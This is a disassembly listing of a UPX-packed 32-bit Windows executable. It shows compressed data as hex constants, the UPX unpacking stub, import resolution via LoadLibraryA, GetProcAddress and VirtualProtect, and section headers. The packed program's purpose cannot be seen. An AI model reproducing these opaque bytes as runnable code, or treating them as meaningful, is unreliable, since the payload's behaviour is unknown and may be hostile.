dd 354B3A35h, 50102B51h, 9381D25h, 0BBFFFF19h, 2E153BFFh
dd 652C1339h, 5210291Eh, 13060709h, 0F285908h, 1C111611h
dd 3F0C4444h, 0F7FFDB0Dh, 150D4CDBh, 1555102Fh, 30117938h
dd 5061B12h, 0A0A1612h, 0DBB79563h, 16637DB7h, 9B0A2609h
dd 22BC0B1Ah, 12FF2613h, 0CD6FB3Fh, 3B1514h, 4CF84550h
dd 0C8000401h, 0B66B3A45h, 0E04690FFh, 0B010200h, 1E0C0801h
dd 5F67130Ch, 29BA3DD7h, 30031004h, 20B400Dh, 2D82CDD2h
dd 0C073304h, 3B364B60h, 2B101E5Bh, 96480607h, 4892C597h
dd 402E3C32h, 0EC503972h, 0E6D8A701h, 1E1CB207h, 7865742Eh
dd 901D4B74h, 2FB0BBB8h, 202304EBh, 64722ECDh, 0DB720BECh
dd 0F6FB6130h, 27222302h, 2EEBDD9Dh, 262E0240h, 0CB021C10h
dd 73816EB7h, 654FC016h, 3A636F6Ch, 3C832537h, 1B422650h
dd 0ED9FC000h, 4A2332A0h, 513Bh, 1, 20000000h, 0FFh, 3 dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_AC = byte ptr -0ACh
pusha
mov esi, offset dword_406000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_4071F2
; ---------------------------------------------------------------------------
align 8
loc_4071E8: ; CODE XREF: start:loc_4071F9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_4071EE: ; CODE XREF: start+B6�j start+CD�j
add ebx, ebx
jnz short loc_4071F9
loc_4071F2: ; CODE XREF: start+10�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4071F9: ; CODE XREF: start+20�j
jb short loc_4071E8
mov eax, 1
loc_407200: ; CODE XREF: start+3F�j start+4A�j
add ebx, ebx
jnz short loc_40720B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40720B: ; CODE XREF: start+32�j
adc eax, eax
add ebx, ebx
jnb short loc_407200
jnz short loc_40721C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_407200
loc_40721C: ; CODE XREF: start+41�j
xor ecx, ecx
sub eax, 3
jb short loc_407230
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_4072A2
mov ebp, eax
loc_407230: ; CODE XREF: start+51�j
add ebx, ebx
jnz short loc_40723B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40723B: ; CODE XREF: start+62�j
adc ecx, ecx
add ebx, ebx
jnz short loc_407248
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407248: ; CODE XREF: start+6F�j
adc ecx, ecx
jnz short loc_40726C
inc ecx
loc_40724D: ; CODE XREF: start+8C�j start+97�j
add ebx, ebx
jnz short loc_407258
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407258: ; CODE XREF: start+7F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_40724D
jnz short loc_407269
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40724D
loc_407269: ; CODE XREF: start+8E�j
add ecx, 2
loc_40726C: ; CODE XREF: start+7A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40728C
loc_40727D: ; CODE XREF: start+B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40727D
jmp loc_4071EE
; ---------------------------------------------------------------------------
align 4
loc_40728C: ; CODE XREF: start+AB�j start+C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40728C
add edi, ecx
jmp loc_4071EE
; ---------------------------------------------------------------------------
loc_4072A2: ; CODE XREF: start+5C�j
pop esi
mov edi, esi
mov ecx, 0A4h
loc_4072AA: ; CODE XREF: start+E1�j start+E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_4072AF: ; CODE XREF: start+104�j
cmp al, 1
ja short loc_4072AA
cmp byte ptr [edi], 4
jnz short loc_4072AA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_4072AF
lea edi, [esi+5000h]
loc_4072DC: ; CODE XREF: start+12E�j
mov eax, [edi]
or eax, eax
jz short loc_40731E
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+703Ch]
xchg eax, ebp
loc_4072F9: ; CODE XREF: start+146�j
mov al, [edi]
inc edi
or al, al
jz short loc_4072DC
mov ecx, edi
push edi
dec eax
repne scasb
push ebp
call dword ptr [esi+7040h]
or eax, eax
jz short loc_407318
mov [ebx], eax
add ebx, 4
jmp short loc_4072F9
; ---------------------------------------------------------------------------
loc_407318: ; CODE XREF: start+13F�j
call dword ptr [esi+7048h]
loc_40731E: ; CODE XREF: start+110�j
add edi, 4
lea ebx, [esi-4]
loc_407324: ; CODE XREF: start+170�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_40734F
cmp al, 0EFh
ja short loc_407342
loc_407331: ; CODE XREF: start+17D�j
add ebx, eax
mov eax, [ebx]
xchg al, ah
rol eax, 10h
xchg al, ah
add eax, esi
mov [ebx], eax
jmp short loc_407324
; ---------------------------------------------------------------------------
loc_407342: ; CODE XREF: start+15F�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
jmp short loc_407331
; ---------------------------------------------------------------------------
loc_40734F: ; CODE XREF: start+15B�j
mov ebp, [esi+7044h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+1EFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp+2Ch+var_AC]
loc_407383: ; CODE XREF: start+1B7�j
push 0
cmp esp, eax
jnz short loc_407383
sub esp, 0FFFFFF80h
jmp sub_4029BA
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 408000h
dd 3 dup(0)
dd 8058h, 803Ch, 3 dup(0)
dd 8065h, 8050h, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E6169Ah, 77E75CB5h, 0
aJW db 'jÉÔw',0
align 4
aKernel32_dll db 'KERNEL32.DLL',0
aUser32_dll db 'USER32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74726956h, 506C6175h, 65746F72h, 7463h
dd 74697845h, 636F7250h, 737365h, 73770000h, 6E697270h
dd 416674h, 7000h, 0Ch, 31D2h, 3CFh dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 409000h
align 2000h
_idata2 ends
end start